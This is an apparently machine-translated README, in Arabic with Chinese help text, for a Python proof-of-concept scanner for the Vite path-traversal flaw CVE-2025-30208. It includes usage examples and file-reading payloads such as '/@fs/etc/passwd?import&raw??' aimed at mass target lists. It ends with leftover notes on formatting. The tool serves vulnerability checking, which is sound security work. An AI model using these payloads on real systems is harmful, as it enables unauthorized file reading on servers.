
Vite-CVE-2025-30208 سكريبت كشف ديناميكي، يدعم المسار الافتراضي، كشف ديناميكي للمسار المخصص.
الثغرات الأمنية وخطوات إعادة إنتاجها الموصوفة في هذه الوثيقة هي لأغراض البحث والتعليم في مجال الأمن السيبراني فقط. لا يجوز لأي شخص استخدام المعلومات المقدمة في هذه الوثيقة لأغراض غير قانونية أو لاختبار أنظمة غير مصرح بها. لا يتحمل المؤلف أي مسؤولية عن أي أضرار مباشرة أو غير مباشرة ناتجة عن استخدام المعلومات الواردة في هذه الوثيقة.
يرجى الاستشهاد بالمصدر!
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Vite路径遍历漏洞检测工具 Author:iSee857
optional arguments:
-h, --help 显示帮助信息
-f FILE, --file FILE 包含目标URL的文件
-u URL, --url URL 单个目标URL
-p PAYLOAD, --payload PAYLOAD
自定义检测路径(支持两种格式):
1. 带检测标识: /path??indicator
2. 仅路径: /path?param=1??
示例:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY 代理服务器地址(如: http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
输出文件名(默认: results.xlsx)
-t THREADS, --threads THREADS
并发线程数量(默认: 50,范围: 1-200)```
أمثلة الاستخدام
1. فحص هدف واحد:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2. فحص ملف أهداف متعددة:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3. استخدام حمولة مخصصة:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4. استخدام وكيل للتصحيح:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5. استخدام مجموعة من المعلمات:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx


# شرح العناصر الأساسية:
1. استخدام كتل التعليمات البرمجية لعرض وصف المعلمات وأمثلة الاستخدام
2. يحتفظ وصف المعلمات بتنسيق معلومات المساعدة الأصلي
3. تغطي الأمثلة سيناريوهات الاستخدام الرئيسية
4. إبراز القيم الافتراضية ونطاقات القيم
5. الحفاظ على وصف المعلمات المطابق للكود الأصلي
6. استخدام عناوين بمستويات مختلفة لتنظيم المحتوى